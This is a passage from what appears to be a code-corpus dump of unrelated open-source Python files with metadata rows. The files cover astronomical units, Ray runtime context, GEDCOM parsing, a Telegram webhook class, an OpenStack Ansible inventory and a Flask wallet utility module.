class Eijk(Function):
"""
Represents the Levi-Civita symbol (antisymmetric symbol)
"""
nargs = 3
@classmethod
def eval(cls, i, j, k):
i, j, k = map(sympify, (i, j, k))
if (i,j,k) in [(1,2,3), (2,3,1), (3,1,2)]:
return S.One
elif (i,j,k) in [(1,3,2), (3,2,1), (2,1,3)]:
return S.NegativeOne
elif i==j or j==k or k==i:
return S.Zero
|
bsd-3-clause
| -3,756,714,093,554,926,600
| 27.731707
| 79
| 0.44652
| false
| 3.526946
| false
| false
| false
|
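A quick sketch of how the two symbols defined above evaluate; the import path is assumed from this file's location in an older sympy snapshot.
# Hedged example of the Kronecker delta and Levi-Civita helpers shown above.
from sympy.functions.special.tensor_functions import Dij, Eijk
print(Dij(2, 2))      # 1, indices equal
print(Dij(1, 3))      # 0, distinct numeric indices
print(Eijk(1, 2, 3))  # 1, even permutation
print(Eijk(1, 3, 2))  # -1, odd permutation
print(Eijk(1, 1, 2))  # 0, repeated index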
ryanvarley/ExoData
|
exodata/astroquantities.py
|
1
|
1806
|
""" Temp module until astro units are added to quantities
"""
from quantities import *
L_s = solar_luminosity = UnitQuantity(
'solar_luminosity',
3.839*(10**26)*W,
symbol='L_s',
)
L_s.latex_symbol = 'L_\odot'
R_s = solar_radius = UnitLength(
'solar_radius',
6.995 * (10**8) * m,
aliases=['solar_radii'],
symbol='R_s',
)
R_s.latex_symbol = 'R_\odot'
R_e = earth_radius = UnitLength(
'earth_radius',
6.371 * (10**6) * m,
aliases=['earth_radii'],
symbol='R_e',
)
R_e.latex_symbol = 'R_\oplus'
R_j = jupiter_radius = UnitLength(
'jupiter_radius',
6.9911 * (10**7) * m,
aliases=['jupiter_radii'],
symbol='R_j',
)
R_j.latex_symbol = 'R_J'
M_s = solar_mass = UnitMass(
'solar_mass', 1.99*(10**30)*kg,
aliases=['solar_masses'],
symbol='M_s',
)
M_s.latex_symbol = 'M_\odot'
M_e = earth_mass = UnitMass(
'earth_mass', 5.97219*(10**24)*kg,
aliases=['earth_masses'],
symbol='M_e',
)
M_e.latex_symbol = 'M_\oplus'
M_j = jupiter_mass = UnitMass(
'jupiter_mass', 1.8986*(10**27)*kg,
aliases=['jupiter_masses'],
symbol='M_j',
)
M_j.latex_symbol = 'M_J'
Gyear = giga_year = UnitTime(
'giga_year', 10**9*year,
symbol='Gyr',
)
JulianDay = julian_day = JD = UnitTime(
'julian_day', day,
symbol='JD',
)
""" Note while quantities doesnt directly support units with an offset in most cases Julian Days are treated like days.
It is useful then to know if your working in Julian Days, MJD, BJD etc"""
ModifiedJulianDate = modified_julian_day = MJD = UnitTime(
'modified_julian_day', day,
symbol='MJD',
)
# Compound Units
gcm3 = CompoundUnit('g /cm**3')
gcm3.latex_symbol = 'g/cm^3'
kgm3 = CompoundUnit('kg /m**3')
kgm3.latex_symbol = 'kg/m^3'
ms2 = CompoundUnit('m/s**2')
ms2.latex_symbol = 'm/s^2'
|
mit
| 8,007,810,740,782,752,000
| 21.036585
| 119
| 0.609081
| false
| 2.443843
| false
| false
| false
|
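A small sketch of converting between the custom astro units above, assuming the standard quantities rescale() API and the exodata import path.
# Hedged example: convert a length and a mass between the units defined above.
from exodata.astroquantities import R_e, R_j, M_e, M_j
radius = 2 * R_j
print(radius.rescale(R_e))   # roughly 21.9 earth radii
mass = 1 * M_j
print(mass.rescale(M_e))     # roughly 318 earth masses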
richardliaw/ray
|
python/ray/runtime_context.py
|
1
|
4842
|
import ray.worker
import logging
logger = logging.getLogger(__name__)
class RuntimeContext(object):
"""A class used for getting runtime context."""
def __init__(self, worker):
assert worker is not None
self.worker = worker
def get(self):
"""Get a dictionary of the current_context.
Fields that are not available (for example, the actor id inside a task)
are not included in the result.
Returns:
dict: Dictionary of the current context.
"""
context = {
"job_id": self.job_id,
"node_id": self.node_id,
"task_id": self.task_id,
"actor_id": self.actor_id
}
# Remove fields that are None.
return {
key: value
for key, value in context.items() if value is not None
}
@property
def job_id(self):
"""Get current job ID for this worker or driver.
Job ID is the id of your Ray drivers that create tasks or actors.
Returns:
If called by a driver, this returns the job ID. If called in
a task, return the job ID of the associated driver.
"""
job_id = self.worker.current_job_id
assert not job_id.is_nil()
return job_id
@property
def node_id(self):
"""Get current node ID for this worker or driver.
Node ID is the id of a node that your driver, task, or actor runs.
Returns:
a node id for this worker or driver.
"""
node_id = self.worker.current_node_id
assert not node_id.is_nil()
return node_id
@property
def task_id(self):
"""Get current task ID for this worker or driver.
Task ID is the id of a Ray task.
This shouldn't be used in a driver process.
Example:
>>> @ray.remote
>>> class Actor:
>>> def ready(self):
>>> return True
>>>
>>> @ray.remote
>>> def f():
>>> return True
>>>
>>> # All the below code will generate different task ids.
>>> # Task ids are available for actor creation.
>>> a = Actor.remote()
>>> # Task ids are available for actor tasks.
>>> a.ready.remote()
>>> # Task ids are available for normal tasks.
>>> f.remote()
Returns:
The current worker's task id. None if there's no task id.
"""
# only worker mode has actor_id
assert self.worker.mode == ray.worker.WORKER_MODE, (
f"This method is only available when the process is a\
worker. Current mode: {self.worker.mode}")
task_id = self.worker.current_task_id
return task_id if not task_id.is_nil() else None
@property
def actor_id(self):
"""Get the current actor ID in this worker.
ID of the actor of the current process.
This shouldn't be used in a driver process.
Returns:
The current actor id in this worker. None if there's no actor id.
"""
# only worker mode has actor_id
assert self.worker.mode == ray.worker.WORKER_MODE, (
f"This method is only available when the process is a\
worker. Current mode: {self.worker.mode}")
actor_id = self.worker.actor_id
return actor_id if not actor_id.is_nil() else None
@property
def was_current_actor_reconstructed(self):
"""Check whether this actor has been restarted
Returns:
Whether this actor has been ever restarted.
"""
assert not self.actor_id.is_nil(), (
"This method should't be called inside Ray tasks.")
actor_info = ray.state.actors(self.actor_id.hex())
return actor_info and actor_info["NumRestarts"] != 0
@property
def current_placement_group_id(self):
"""Get the current Placement group ID of this worker.
Returns:
The current placement group id of this worker.
"""
return self.worker.placement_group_id
@property
def should_capture_child_tasks_in_placement_group(self):
"""Get if the current task should capture parent's placement group.
This returns True if it is called inside a driver.
Returns:
Return True if the current task should implicitly
capture the parent placement group.
"""
return self.worker.should_capture_child_tasks_in_placement_group
_runtime_context = None
def get_runtime_context():
global _runtime_context
if _runtime_context is None:
_runtime_context = RuntimeContext(ray.worker.global_worker)
return _runtime_context
|
apache-2.0
| -9,188,469,718,043,545,000
| 29.840764
| 78
| 0.57311
| false
| 4.39782
| false
| false
| false
|
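A hedged sketch of reading the context from inside a task, based only on the accessors shown above; in this snapshot the helper lives in ray.runtime_context, and task_id/actor_id are only meaningful in worker mode.
# Hedged example: inspect the runtime context from inside a Ray task.
import ray
from ray.runtime_context import get_runtime_context
ray.init()
@ray.remote
def where_am_i():
    # get() only returns the fields that are available in this process.
    return get_runtime_context().get()
print(ray.get(where_am_i.remote()))  # e.g. job_id, node_id and task_id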
andy-z/ged4py
|
docs/example_code/example3.py
|
1
|
1988
|
import sys
from ged4py.parser import GedcomReader
from ged4py.date import DateValueVisitor
class DateFormatter(DateValueVisitor):
"""Visitor class that produces string representation of dates.
"""
def visitSimple(self, date):
return f"{date.date}"
def visitPeriod(self, date):
return f"from {date.date1} to {date.date2}"
def visitFrom(self, date):
return f"from {date.date}"
def visitTo(self, date):
return f"to {date.date}"
def visitRange(self, date):
return f"between {date.date1} and {date.date2}"
def visitBefore(self, date):
return f"before {date.date}"
def visitAfter(self, date):
return f"after {date.date}"
def visitAbout(self, date):
return f"about {date.date}"
def visitCalculated(self, date):
return f"calculated {date.date}"
def visitEstimated(self, date):
return f"estimated {date.date}"
def visitInterpreted(self, date):
return f"interpreted {date.date} ({date.phrase})"
def visitPhrase(self, date):
return f"({date.phrase})"
format_visitor = DateFormatter()
with GedcomReader(sys.argv[1]) as parser:
# iterate over each INDI record in a file
for i, indi in enumerate(parser.records0("INDI")):
print(f"{i}: {indi.name.format()}")
# get all possible event types and print their dates,
# full list of events is longer, this is only an example
events = indi.sub_tags("BIRT", "CHR", "DEAT", "BURI", "ADOP", "EVEN")
for event in events:
date = event.sub_tag_value("DATE")
# Some event types like generic EVEN can define TYPE tag
event_type = event.sub_tag_value("TYPE")
# pass a visitor to format the date
if date:
date_str = date.accept(format_visitor)
else:
date_str = "N/A"
print(f" event: {event.tag} date: {date_str} type: {event_type}")
|
mit
| 2,323,925,988,355,210,000
| 29.584615
| 80
| 0.612173
| false
| 3.641026
| false
| false
| false
|
luckydonald/pytgbot
|
pytgbot/webhook.py
|
1
|
5203
|
# -*- coding: utf-8 -*-
from luckydonaldUtils.logger import logging
from pytgbot.bot import Bot
from pytgbot.exceptions import TgApiServerException, TgApiParseException
__author__ = 'luckydonald'
logger = logging.getLogger(__name__)
class Webhook(Bot):
"""
Subclass of Bot, returned after a successful webhook setup.
Differs from the normal Bot class in that the sending function stores the result to send,
so you can actually get that and return the data in response to your incoming message.
"""
stored_request = None
def _prepare_request(self, command, query):
"""
:param command: The Url command parameter
:type command: str
:param query: will get json encoded.
:type query: dict
:return:
"""
from luckydonaldUtils.encoding import to_native as n
from pytgbot.api_types.sendable import Sendable
from pytgbot.api_types import as_array
from DictObject import DictObject
import json
params = {}
for key in query.keys():
element = query[key]
if element is not None:
if isinstance(element, Sendable):
params[key] = json.dumps(as_array(element))
else:
params[key] = element
url = self._base_url.format(api_key=n(self.api_key), command=n(command))
return DictObject(url=url, params=params)
# end def
def _do_request(self, url, params=None, files=None, use_long_polling=None, request_timeout=None):
"""
:param url: The complete url to send to
:type url: str
:keyword params: Parameter for that connection
:keyword files: Optional files parameters
:keyword use_long_polling: if it should use long polling.
(see http://docs.python-requests.org/en/latest/api/#requests.Response.iter_content)
:type use_long_polling: bool
:keyword request_timeout: When the request should time out.
:type request_timeout: int
:return: json data received
:rtype: DictObject.DictObject
"""
import requests
r = requests.post(url, params=params, files=files, stream=use_long_polling,
verify=True, timeout=request_timeout)
# No self signed certificates. Telegram should be trustworthy anyway...
from DictObject import DictObject
try:
logger.debug("Response: {}".format(r.json()))
json_data = DictObject.objectify(r.json())
except Exception:
logger.exception("Parsing answer failed.\nRequest: {r!s}\nContent: {r.content}".format(r=r))
raise
# end if
json_data["response"] = r # TODO: does this failes on json lists? Does TG does that?
return json_data
# end def
def _process_response(self, json_data):
# TG should always return an dict, with at least a status or something.
if self.return_python_objects:
if json_data.ok != True:
raise TgApiServerException(
error_code=json_data.error_code if "error_code" in json_data else None,
response=json_data.response if "response" in json_data else None,
description=json_data.description if "description" in json_data else None,
request=json_data.response.request if "response" in json_data else None
)
# end if not ok
if "result" not in json_data:
raise TgApiParseException('Key "result" is missing.')
# end if no result
return json_data.result
# end if return_python_objects
return json_data
# end def
def do(self, command, files=None, use_long_polling=False, request_timeout=None, **query):
"""
Send a request to the api.
If the bot is set to return the json objects, it will look like this:
```json
{
"ok": bool,
"result": {...},
# optionally present:
"description": "human-readable description of the result",
"error_code": int
}
```
:param command: The Url command parameter
:type command: str
:keyword request_timeout: When the request should time out.
:type request_timeout: int
:keyword files: if it needs to send files.
:keyword use_long_polling: if it should use long polling.
(see http://docs.python-requests.org/en/latest/api/#requests.Response.iter_content)
:type use_long_polling: bool
:param query: will get json encoded.
:return: The json response from the server, or, if `self.return_python_objects` is `True`, a parsed return type.
:rtype: DictObject.DictObject | pytgbot.api_types.receivable.Receivable
"""
params = self._prepare_request(command, query)
r = self._do_request(
params.url, params=params.params,
files=files, use_long_polling=use_long_polling, request_timeout=request_timeout
)
return self._process_response(r)
# end def do
|
gpl-3.0
| 6,613,766,085,546,908,000
| 34.155405
| 120
| 0.596771
| false
| 4.209547
| false
| false
| false
|
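A minimal sketch of using the subclass above; the token is a placeholder and getMe is a standard Telegram Bot API method.
# Hedged example: the Webhook subclass is driven like the regular Bot.
from pytgbot.webhook import Webhook
bot = Webhook("123456:YOUR-BOT-API-TOKEN")  # placeholder token (assumed Bot constructor signature)
me = bot.do("getMe")                        # plain API call routed through do()
print(me)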
schilli/MOPS
|
MOPS/CorrFunction.py
|
1
|
2568
|
# -*- coding: UTF-8 -*-
from __future__ import print_function, division
import numpy as np
class CorrFunction(object):
"""
correlation function data, additional information and manipulation methods
Parameters
----------
corr : (nvec, nframes) array
Correlation functions
std : (nvec, nframes) array
Correlation function standard deviations
error : (nvec, nframes) array
Correlation function standard error of the mean
info : dict
Dictionary with information on correlation functions
"""
def __init__(self, corr=None, std=None, error=None, info=None):
self.corr = corr
self.std = std
self.error = error
if info is not None:
self.resid = info['bondvecinfo']['resid' ]
self.resindex = info['bondvecinfo']['resindex' ]
self.resname = info['bondvecinfo']['resnames' ]
self.atomindex = info['bondvecinfo']['atomindex' ]
self.atomname = info['bondvecinfo']['atomnames' ]
self.element = info['bondvecinfo']['element' ]
self.chain = info['bondvecinfo']['chain' ]
self.bondlength = info['bondvecinfo']['bondlength']
self.bondvec = info['bondvecinfo']['bondvec' ]
self.fitgroup = info['bondvecinfo']['fitgroup' ]
try:
self.fit = info['bondvecinfo']['fit' ]
except KeyError:
self.fit = False
try:
self.S2direct = np.array(info['bondvecinfo']['S2'])
except KeyError:
self.S2direct = None
self.dt = info['bondvecinfo']['dt' ]
self.topfilename = info['topfilename']
self.npzfilename = info['npzfilename']
self.trjfilename = info['trjfilename']
self.frames = info['frames' ]
else:
self.resid = None
self.resindex = None
self.resname = None
self.atomindex = None
self.atomname = None
self.element = None
self.chain = None
self.bondlength = None
self.bondvec = None
self.fitgroup = None
self.fit = None
self.dt = None
self.topfilename = None
self.npzfilename = None
self.trjfilename = None
self.frames = None
|
gpl-3.0
| 2,965,479,022,776,792,600
| 34.666667
| 78
| 0.511682
| false
| 4.323232
| false
| false
| false
|
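A tiny sketch constructing the container above without metadata; passing info=None leaves the descriptive attributes set to None.
# Hedged example: wrap synthetic correlation functions with no extra metadata.
import numpy as np
from MOPS.CorrFunction import CorrFunction
corr = np.random.rand(3, 100)        # 3 bond vectors, 100 frames (made-up data)
cf = CorrFunction(corr=corr)
print(cf.corr.shape, cf.resid)       # (3, 100) None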
narfman0/D3OrganDropCalculator
|
calculator.py
|
1
|
1510
|
#!/bin/python
import sys
from math import pow
DEFAULT_TORMENT = 2
DEFAULT_RUNS = 5
#generate pascals triangle
def pascalsTriangle(rows):
for rownum in range (rows):
newValue=1
rlist = [newValue]
for iteration in range (rownum):
newValue = newValue * ( rownum-iteration ) * 1 / ( iteration + 1 )
rlist.append(int(newValue))
return rlist
#p to drop organ given torment level
def pOrganDrop(torment):
return .25+(torment-1)/20.0
#p to drop organ given torment level, iteration, and total iterations
def pOrganDropI(torment, i, total):
psuccess=pow(pOrganDrop(torment), total-i)
pnotsuccess=1
if i > 0:
pnotsuccess=pow(1-pOrganDrop(torment), i)
return psuccess*pnotsuccess
#p to drop organ at given torment/run level
def calculate(torment,runs):
triangle=pascalsTriangle(runs+1)
p=0.0
i=0
for leaf in triangle:
if i < len(triangle)-1:
pi = pOrganDropI(torment, i, runs) * leaf
p += pi
print('pdrop(i):' + str(i) + ' is ' + str(pi) + ' total: ' + str(p))
i+=1
return p
if __name__ == "__main__":
if len(sys.argv) != 3:
print('Usage: ./calculator.py <torment level> <#runs>' +
' using default torment level ' + str(DEFAULT_TORMENT) + ' with ' + str(DEFAULT_RUNS) + ' runs')
torment=DEFAULT_TORMENT
runs=DEFAULT_RUNS
else:
torment=int(sys.argv[1])
runs=int(sys.argv[2])
pdrop=calculate(torment,runs)
print('pdrop for a given organ=' + str(pdrop) + ', pdrop for all three is=' + str(pow(pdrop,3.0)))
|
gpl-2.0
| 294,702,526,321,510,850
| 27.490566
| 100
| 0.653642
| false
| 2.89272
| false
| false
| false
|
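The calculate() loop above sums the binomial terms C(runs, i) * p^(runs-i) * (1-p)^i for i < runs, i.e. the probability of at least one organ drop; a hedged cross-check using the equivalent closed form 1 - (1-p)^runs:
# Hedged cross-check of calculate(): P(at least one drop in n runs) = 1 - (1 - p)**n.
def p_organ_drop(torment):
    return 0.25 + (torment - 1) / 20.0
def p_at_least_one(torment, runs):
    return 1.0 - (1.0 - p_organ_drop(torment)) ** runs
p = p_at_least_one(2, 5)   # the script's defaults: torment 2, 5 runs
print(p)                   # ~0.832, matching the summed binomial terms
print(p ** 3)              # same cube the script prints for all three organs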
anpingli/openshift-ansible
|
playbooks/openstack/inventory.py
|
1
|
8124
|
#!/usr/bin/env python
"""
This is an Ansible dynamic inventory for OpenStack.
It requires your OpenStack credentials to be set in clouds.yaml or your shell
environment.
"""
from __future__ import print_function
from collections import Mapping
import json
import os
import shade
def base_openshift_inventory(cluster_hosts):
'''Set the base openshift inventory.'''
inventory = {}
masters = [server.name for server in cluster_hosts
if server.metadata['host-type'] == 'master']
etcd = [server.name for server in cluster_hosts
if server.metadata['host-type'] == 'etcd']
if not etcd:
etcd = masters
infra_hosts = [server.name for server in cluster_hosts
if server.metadata['host-type'] == 'node' and
server.metadata['sub-host-type'] == 'infra']
app = [server.name for server in cluster_hosts
if server.metadata['host-type'] == 'node' and
server.metadata['sub-host-type'] == 'app']
cns = [server.name for server in cluster_hosts
if server.metadata['host-type'] == 'cns']
nodes = list(set(masters + infra_hosts + app + cns))
dns = [server.name for server in cluster_hosts
if server.metadata['host-type'] == 'dns']
load_balancers = [server.name for server in cluster_hosts
if server.metadata['host-type'] == 'lb']
osev3 = list(set(nodes + etcd + load_balancers))
inventory['cluster_hosts'] = {'hosts': [s.name for s in cluster_hosts]}
inventory['OSEv3'] = {'hosts': osev3}
inventory['masters'] = {'hosts': masters}
inventory['etcd'] = {'hosts': etcd}
inventory['nodes'] = {'hosts': nodes}
inventory['infra_hosts'] = {'hosts': infra_hosts}
inventory['app'] = {'hosts': app}
inventory['glusterfs'] = {'hosts': cns}
inventory['dns'] = {'hosts': dns}
inventory['lb'] = {'hosts': load_balancers}
inventory['localhost'] = {'ansible_connection': 'local'}
return inventory
def get_docker_storage_mountpoints(volumes):
'''Check volumes to see if they're being used for docker storage'''
docker_storage_mountpoints = {}
for volume in volumes:
if volume.metadata.get('purpose') == "openshift_docker_storage":
for attachment in volume.attachments:
if attachment.server_id in docker_storage_mountpoints:
docker_storage_mountpoints[attachment.server_id].append(attachment.device)
else:
docker_storage_mountpoints[attachment.server_id] = [attachment.device]
return docker_storage_mountpoints
def _get_hostvars(server, docker_storage_mountpoints):
ssh_ip_address = server.public_v4 or server.private_v4
hostvars = {
'ansible_host': ssh_ip_address
}
public_v4 = server.public_v4 or server.private_v4
if public_v4:
hostvars['public_v4'] = server.public_v4
hostvars['openshift_public_ip'] = server.public_v4
# TODO(shadower): what about multiple networks?
if server.private_v4:
hostvars['private_v4'] = server.private_v4
hostvars['openshift_ip'] = server.private_v4
# NOTE(shadower): Yes, we set both hostname and IP to the private
# IP address for each node. OpenStack doesn't resolve nodes by
# name at all, so using a hostname here would require an internal
# DNS which would complicate the setup and potentially introduce
# performance issues.
hostvars['openshift_hostname'] = server.metadata.get(
'openshift_hostname', server.private_v4)
hostvars['openshift_public_hostname'] = server.name
if server.metadata['host-type'] == 'cns':
hostvars['glusterfs_devices'] = ['/dev/nvme0n1']
node_labels = server.metadata.get('node_labels')
# NOTE(shadower): the node_labels value must be a dict not string
if not isinstance(node_labels, Mapping):
node_labels = json.loads(node_labels)
if node_labels:
hostvars['openshift_node_labels'] = node_labels
# check for attached docker storage volumes
if 'os-extended-volumes:volumes_attached' in server:
if server.id in docker_storage_mountpoints:
hostvars['docker_storage_mountpoints'] = ' '.join(
docker_storage_mountpoints[server.id])
return hostvars
def build_inventory():
'''Build the dynamic inventory.'''
cloud = shade.openstack_cloud()
# TODO(shadower): filter the servers based on the `OPENSHIFT_CLUSTER`
# environment variable.
cluster_hosts = [
server for server in cloud.list_servers()
if 'metadata' in server and 'clusterid' in server.metadata]
inventory = base_openshift_inventory(cluster_hosts)
for server in cluster_hosts:
if 'group' in server.metadata:
group = server.metadata.get('group')
if group not in inventory:
inventory[group] = {'hosts': []}
inventory[group]['hosts'].append(server.name)
inventory['_meta'] = {'hostvars': {}}
# cinder volumes used for docker storage
docker_storage_mountpoints = get_docker_storage_mountpoints(
cloud.list_volumes())
for server in cluster_hosts:
inventory['_meta']['hostvars'][server.name] = _get_hostvars(
server,
docker_storage_mountpoints)
stout = _get_stack_outputs(cloud)
if stout is not None:
try:
inventory['localhost'].update({
'openshift_openstack_api_lb_provider':
stout['api_lb_provider'],
'openshift_openstack_api_lb_port_id':
stout['api_lb_vip_port_id'],
'openshift_openstack_api_lb_sg_id':
stout['api_lb_sg_id']})
except KeyError:
pass # Not an API load balanced deployment
try:
inventory['OSEv3']['vars'] = _get_kuryr_vars(cloud, stout)
except KeyError:
pass # Not a kuryr deployment
return inventory
def _get_stack_outputs(cloud_client):
"""Returns a dictionary with the stack outputs"""
cluster_name = os.getenv('OPENSHIFT_CLUSTER', 'openshift-cluster')
stack = cloud_client.get_stack(cluster_name)
if stack is None or stack['stack_status'] not in (
'CREATE_COMPLETE', 'UPDATE_COMPLETE'):
return None
data = {}
for output in stack['outputs']:
data[output['output_key']] = output['output_value']
return data
def _get_kuryr_vars(cloud_client, data):
"""Returns a dictionary of Kuryr variables resulting of heat stacking"""
settings = {}
settings['kuryr_openstack_pod_subnet_id'] = data['pod_subnet']
settings['kuryr_openstack_worker_nodes_subnet_id'] = data['vm_subnet']
settings['kuryr_openstack_service_subnet_id'] = data['service_subnet']
settings['kuryr_openstack_pod_sg_id'] = data['pod_access_sg_id']
settings['kuryr_openstack_pod_project_id'] = (
cloud_client.current_project_id)
settings['kuryr_openstack_auth_url'] = cloud_client.auth['auth_url']
settings['kuryr_openstack_username'] = cloud_client.auth['username']
settings['kuryr_openstack_password'] = cloud_client.auth['password']
if 'user_domain_id' in cloud_client.auth:
settings['kuryr_openstack_user_domain_name'] = (
cloud_client.auth['user_domain_id'])
else:
settings['kuryr_openstack_user_domain_name'] = (
cloud_client.auth['user_domain_name'])
# FIXME(apuimedo): consolidate kuryr controller credentials into the same
# vars the openstack playbook uses.
settings['kuryr_openstack_project_id'] = cloud_client.current_project_id
if 'project_domain_id' in cloud_client.auth:
settings['kuryr_openstack_project_domain_name'] = (
cloud_client.auth['project_domain_id'])
else:
settings['kuryr_openstack_project_domain_name'] = (
cloud_client.auth['project_domain_name'])
return settings
if __name__ == '__main__':
print(json.dumps(build_inventory(), indent=4, sort_keys=True))
|
apache-2.0
| -2,398,377,176,609,801,000
| 36.09589
| 94
| 0.634663
| false
| 3.868571
| false
| false
| false
|
ryfx/modrana
|
modules/mod_sketch.py
|
1
|
2168
|
# -*- coding: utf-8 -*-
#----------------------------------------------------------------------------
# Sketching on touchscreen
#----------------------------------------------------------------------------
# Copyright 2008, Oliver White
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#---------------------------------------------------------------------------
from modules.base_module import RanaModule
from time import time
# only import GTK libs if the GTK GUI is used
from core import gs
if gs.GUIString == "GTK":
import cairo
def getModule(*args, **kwargs):
return Sketch(*args, **kwargs)
class Sketch(RanaModule):
"""Sketching functionality"""
def __init__(self, *args, **kwargs):
RanaModule.__init__(self, *args, **kwargs)
self.points = []
if 0: # to test
m = self.m.get("menu", None)
if m:
m.clearMenu('sketch', "set:menu:None")
self.set("menu", "sketch")
def drawMenu(self, cr, menuName, args=None):
if self.get("menu", "") == "sketch":
(x, y, w, h) = self.get('viewport')
count = 0
for p in self.points:
if count == 0:
cr.move_to(p[0], p[1])
else:
cr.line_to(p[0], p[1])
count += 1
cr.stroke()
mod = self.m.get("clickHandler", None)
if mod:
mod.registerDraggableEntireScreen("sketch")
def dragEvent(self, startX, startY, dx, dy, x, y):
self.points.append((x, y))
|
gpl-3.0
| 3,229,469,049,537,184,000
| 32.369231
| 77
| 0.532749
| false
| 4.082863
| false
| false
| false
|
Paymiumm/virtual_wallet_api
|
app/api_version/utils/__init__.py
|
1
|
8126
|
# ~ util package that would hold common functionalities and tools that all versions of the api would use
# (@: Name): "mailMorth"
# (@:Description): "email Management, and automation api code"
# (@:Author): "inteliJence development team"
# Licensed under the Apache License 2.0 and inteliJence protective rights; please edit and use it with care.
# this
# import the user handlers
# --------------------------------------
# Import all modules and extentions
# --------------------------------------
from user import Users
from flask_mail import Message
from ext_declaration import mail
from flask import current_app, render_template
from security import generate_confirmation_token, resend_confirmation_token, generate_transact_url, confirm_transact_url
from models import User
import socket
import re
import datetime
import threading
from werkzeug.security import generate_password_hash, check_password_hash
from twilio.rest import Client
from passgen import passgen
from ext_declaration import db
# --------------------------------------
# END IMPORTATIONS
# --------------------------------------
# --------------------------------------
# Start Work
# --------------------------------------
# def generate_one_time_password():
# """passgen modules used to generate one time password"""
# value = passgen(length=6, case='both', digits=True, letters=True, punctuation=False)
# return value
# from app.email import send_email
# end all import
user = Users() # start user manager
def send_email(to, subject, template):
msg = Message(subject, recipients=[to], html=template, sender=current_app.config['MAIL_DEFAULT_SENDER'])
mail.send(msg)
states = ['ABIA',
'ADAMAWA',
'AKWA IBOM',
'ANAMBRA',
'BAUCHI',
'BAYELSA',
'BENUE',
'BORNO',
'CROSS RIVER',
'DELTA',
'EBONYI',
'EDO',
'EKITI',
'ENUGU',
'GOMBE',
'IMO',
'JIGAWA',
'KADUNA',
'KANO',
'KATSINA',
'KEBBI',
'KOGI',
'KWARA',
'LAGOS',
'NASSARAWA',
'NIGER',
'OGUN',
'ONDO',
'OSUN',
'OYO',
'PLATEAU',
'RIVERS',
'SOKOTO',
'TARABA',
'YOBE',
'ZAMFARA',
'State']
def validate_(type_, value):
if type_ == "username":
if re.match("(\S+)([A-z]+)([0-9]*)([-_]*)", value):
print()
re.match("(\S+)([A-z]+)([0-9]*)([-_]*)", value)
return True
else:
print("username regex error")
return False
elif type_ == "password":
if re.match("(\S+)", value):
return True
else:
print("password regex error")
return False
elif type_ == "fullname":
if re.match("([A-z]+) ([A-z]+)", value):
return True
else:
print("name regex error")
return False
elif type_ == "number":
if re.match("([+]+)([0-9]+)", value):
return True
else:
print("number regex error")
return False
elif type_ == "address":
if re.match("^([0-9]+)(\s*)(\S*)([a-zA-Z ]+)(\s*)(\S*)", value):
return True
else:
print("address regex error")
return False
elif type_ == "city":
if re.match("[A-z]{2,}", value):
return True
else:
print("city regex error")
return False
elif type_ == "date":
if re.match("(\d+) (\d+) \d{4}", value):
return True
else:
print("date regex error")
return False
elif type_ == "postal":
if re.match("\d{6}", value):
return True
else:
print("postal regex error")
return False
elif type_ == "state":
for x in states:
if x == value and value != "State":
return True
print("opps states is not valid")
return False
elif type_ == "email":
if re.match("([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+", value):
return True
else:
print("email regex error")
return False
def send_sms(to_number, body):
"""This function is to send_sms using twillio"""
# generate OTP
account_sid = current_app.config['TWILIO_ACCOUNT_SID']
auth_token = current_app.config['TWILIO_AUTH_TOKEN']
twilio_number = current_app.config['TWILIO_NUMBER']
client = Client(account_sid, auth_token)
client.api.messages.create(to_number, body, from_=twilio_number)
def generate_onetime_password():
# return generate_password_hash(str(random.random()))[20:26]
value = passgen(length=6, case='both', digits=True, letters=True, punctuation=False)
return value
def remove_otp(user):
user_ = User.query.filter_by(email=user).first()
user_.password_hash = ""
db.session.add(user_)
db.session.commit()
print(user)
def activate_mail(email):
try:
token = generate_confirmation_token(email)
html = render_template('activateMail.html', confirm_url='http://127.0.0.1:8000/account/confirMail/' + token,
email='http://127.0.0.1:8000/account/resendConfirmation?email=' + email)
subject = 'Paymiumm: Confirm Your Account'
send_email(email, subject, html)
return True
except Exception as e:
print(e)
return False
except socket.gaierror as e:
print(e)
return False
def resend_activate_mail(email=""):
try:
token = resend_confirmation_token(email)
html = render_template('activateMail.html', confirm_url='http://127.0.0.1:8000/account/confirMail/' + token,
email='http://127.0.0.1:8000/account/resendConfirmation?email=' + email)
subject = 'Paymiumm: Confirm Your Account'
send_email(email, subject, html)
except Exception as e:
print(e)
return False
except socket.gaierror as e:
print(e)
return False
def exec_(email):
t = threading.Timer(3, remove_otp, args=[email])
t.start()
return True
def send_one_time_mail(user):
gP = generate_onetime_password()
print(user)
html = render_template('one_password_mail.html', one_time_password=gP)
subject = 'Paymiumm: Your one-time password'
try:
send_email(user, subject, html)
return str(gP)
except Exception as e:
print(e)
return False
except socket.gaierror as e:
print(e)
return False
def send_link_with_email(email, amount, message=None):
try:
details = {'email': email, 'amount': amount}
token = generate_transact_url(details)
html = render_template('send_money_link.html', confirm_url='' + token, email='')
subject = message
if message is None:
send_email(email, subject, html)
else:
send_email(email, subject, html)
return True
except Exception as e:
print(e)
return False
except socket.gaierror as e:
print(e)
return False
def send_link_with_text(number, amount, message=None):
try:
details = {'number': number, 'amount': amount}
token = generate_transact_url(details)
subject = message
if message is None:
send_sms(to_number=number, body=token)
else:
send_sms(to_number=number, body=token)
return True
except Exception as e:
print(e)
return False
|
apache-2.0
| -1,626,510,524,226,959,000
| 24.469055
| 129
| 0.52412
| false
| 3.888038
| false
| false
| false
|
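A hedged sketch of the pure helpers above that need no mail or SMS backend; the import path follows the file's location and assumes the package's Flask/Twilio dependencies are importable.
# Hedged example: the regex validator and one-time password helper shown above.
from app.api_version.utils import validate_, generate_onetime_password
print(validate_("email", "user@example.com"))  # True
print(validate_("postal", "12345"))            # False, six digits are required
print(validate_("state", "LAGOS"))             # True, present in the states list
print(len(generate_onetime_password()))        # 6, a six-character one-time password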
aurigadl/EnvReactAsk
|
server/apiFuec/models.py
|
1
|
3422
|
from server import db
class Fuec(db.Model):
